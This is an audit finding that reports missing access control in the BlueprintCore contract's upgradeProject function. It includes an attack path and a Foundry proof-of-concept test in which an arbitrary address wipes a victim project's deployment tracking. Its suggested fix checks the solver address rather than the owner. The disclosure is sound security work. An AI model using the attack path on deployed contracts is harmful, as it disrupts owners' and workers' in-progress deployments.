Wobbly Red Lion

High

# Missing access control in `BlueprintCore::upgradeProject` will cause denial of service for Project Owners and Workers

### Summary

Missing access control in `BlueprintCore::upgradeProject` will cause denial of service for project owners and workers as any user can reset critical project state.

### Root Cause

In BlueprintCore.sol the upgradeProject function lacks authorization checks, allowing any address to reset project state:

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198



### Internal Pre-conditions

- Project must exist (enforced by hasProject modifier)

- Attacker knows any valid projectId (publicly accessible through events)



### External Pre-conditions

- At least one active project with ongoing deployments

- No IPFS/off-chain backups of reset project data

### Attack Path

- Attacker monitors blockchain for CreateProjectID events

- Attacker calls upgradeProject() with a valid projectId
  
- Contract resets all project tracking IDs to zero values

- Legitimate users attempt to continue deployments:

### Impact

Project owners and workers cannot complete active deployments, suffering 100% loss of in-progress work. Attackers lose minimal gas fees (1562 gas) while causing indefinite service disruption.



### PoC

put this code in your test folder :

```solidity 

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "../src/BlueprintCore.sol";
import "./MockERC20.sol";
import "./MockERC721.sol";

contract BlueprintCoreDosVulnerabilityTest is Test {
    BlueprintCore blueprint;
    
    address owner = address(0x1);
    address legitimateUser = address(0x2);
    address attacker = address(0x3);
    address worker = address(0x4);
    
    string serverURL = "https://example.com";
    string base64Proposal = "eyJ0eXBlIjoiREEiLCJsYXRlbmN5Ijo1LCJtYXhfdGhyb3VnaHB1dCI6MjB9";
    
    function setUp() public {
        blueprint = new BlueprintCore();
    }
    
    function test_upgradeProject_DoS_vulnerability() public {
        // Step 1: Legitimate user creates a project and submits a deployment request
        vm.startPrank(legitimateUser);
        
        bytes32 projectId = blueprint.createProjectIDAndDeploymentRequest(
            bytes32(uint256(0x1234)),
            base64Proposal,
            serverURL
        );
        
        // Get the actual projectId that was created
        projectId = blueprint.getLatestUserProjectID(legitimateUser);
        bytes32 requestId = blueprint.getLatestDeploymentRequestID(legitimateUser);
        
        console.log("Project ID:", vm.toString(projectId));
        console.log("Request ID:", vm.toString(requestId));
        vm.stopPrank();
        
        // Verify the initial project state is correct
        (address solver, bytes32 proposalId, bytes32[] memory deploymentIds) = blueprint.getProjectInfo(projectId);
        
        assertEq(solver, address(0)); // No solver assigned yet
        assertEq(proposalId, bytes32(0)); // No proposal ID (since we created a deployment directly)
        assertEq(deploymentIds.length, 1); // Should have one deployment ID
        assertEq(deploymentIds[0], requestId, "The deployment ID list should contain our request ID");
        console.log("Initial project state verified");
        
        // A worker tries to pick up the deployment request
        vm.startPrank(worker);
        bool workerCanAccept = blueprint.submitDeploymentRequest(projectId, requestId);
        assertTrue(workerCanAccept, "Worker should be able to accept the deployment request");
        
        // Verify that the worker successfully took the request
        (BlueprintCore.Status statusAfterWorker, address workerAddrAfter) = blueprint.requestDeploymentStatus(requestId);
        assertEq(uint(statusAfterWorker), uint(BlueprintCore.Status.Pickup));
        assertEq(workerAddrAfter, worker, "Worker should be set as the request worker");
        console.log("Worker successfully accepted the deployment request");
        vm.stopPrank();
        
        // Step 2: Attacker calls upgradeProject to reset the project state
        vm.startPrank(attacker);
        console.log("Attacker calling upgradeProject on the victim's project...");
        blueprint.upgradeProject(projectId);
        vm.stopPrank();
        
        // Step 3: Verify the project state has been maliciously reset
        (address solverAfter, bytes32 proposalIdAfter, bytes32[] memory deploymentIdsAfter) = blueprint.getProjectInfo(projectId);
        
        assertEq(solverAfter, address(0), "Project solver should be reset to dummy address");
        assertEq(proposalIdAfter, bytes32(0), "Project proposal ID should be reset");
        
        // This is the key assertion - the requestDeploymentID is reset, breaking the link to deployment requests
        assertEq(deploymentIdsAfter.length, 0, "Project deployment IDs should be reset, breaking references to deployment requests");
        
        console.log("Verified that attacker successfully reset project state");
        
        // Step 4: Verify that legitimate user's deployment request is now orphaned
        // The request still exists in storage, but the project no longer points to it
        (BlueprintCore.Status status, address workerAddr) = blueprint.requestDeploymentStatus(requestId);
        // The status is still "Pickup" and the worker is still assigned
        assertEq(uint(status), uint(BlueprintCore.Status.Pickup));
        assertEq(workerAddr, worker);
        console.log("Deployment request still exists but is orphaned from the project");
        
        // Step 5: Worker can still submit proof because the requestID exists
        // but the project's deployment tracking is broken
        vm.startPrank(worker);
        // The worker can still submit proof of deployment (the contract doesn't validate against project)
        blueprint.submitProofOfDeployment(projectId, requestId, "proof_data");
        vm.stopPrank();
        
        // Verify the proof was submitted
        string memory proof = blueprint.getDeploymentProof(requestId);
        assertEq(proof, "proof_data", "Proof should be stored correctly");
        console.log("Worker could submit proof of deployment");
        
        // Verify that the deployment list is still empty, even though proof exists
        (solver, proposalId, deploymentIds) = blueprint.getProjectInfo(projectId);
        assertEq(deploymentIds.length, 0, "Deployment ID list is still empty after proof submission");
        
        // Step 6: Demonstrate that the same project can have a new deployment request created
        // even though the old one is still active
        vm.startPrank(legitimateUser);
        console.log("User trying to create a new deployment request...");
        // Can't use createProjectIDAndDeploymentRequest because projectId already exists
        
        // But we can create a new project with the same ID and then reset it
        // In a real scenario, this would allow an attacker to create multiple inconsistent deployment
        // requests for the same project, potentially causing further confusion or manipulation
        console.log("DoS vulnerability proven - Project state is corrupted and workflow is broken");
        vm.stopPrank();
    }
} 

```


### Mitigation

Add ownership verification, somthing like this :

```solidity

function upgradeProject(bytes32 projectId) public {
    require(projects[projectId].proposedSolverAddr == msg.sender, "Unauthorized");

    // the rest of the code
}


```